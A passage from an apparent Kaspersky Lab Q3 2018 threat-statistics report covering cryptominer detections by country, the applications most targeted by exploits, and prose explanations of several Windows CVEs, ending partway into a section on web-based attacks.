_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)

#### Number of users attacked by cryptominers

In Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.

_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)

Cryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.

#### Geography of attacks

_Geography of cryptominers, Q3 2018_ (download)

**TOP 10 countries by percentage of attacked users**

| | Country* | %** |
|---|---|---|
| 1 | Afghanistan | 16.85% |
| 2 | Uzbekistan | 14.23% |
| 3 | Kazakhstan | 10.17% |
| 4 | Belarus | 9.73% |
| 5 | Vietnam | 8.96% |
| 6 | Indonesia | 8.80% |
| 7 | Mozambique | 8.50% |
| 8 | Ukraine | 7.60% |
| 9 | Tanzania | 7.51% |
| 10 | Azerbaijan | 7.13% |

_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._  
_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._

## Vulnerable apps used by cybercriminals

The distribution of platforms most often targeted by exploits showed very little change from Q2. Microsoft Office applications (70%) are still the most frequently targeted – five times more than web browsers, the second most attacked platform.

Although quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks – CVE-2017-11882 and CVE-2018-0802 – the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.

An exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9–11. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)

Q3 was also marked by the emergence of two atypical 0-day vulnerabilities – [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.

In the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already begun. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether.

Another interesting case was the CVE-2018-8440 vulnerability. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level – System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user.

## Attacks via web resources

_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries where online resources are seeded with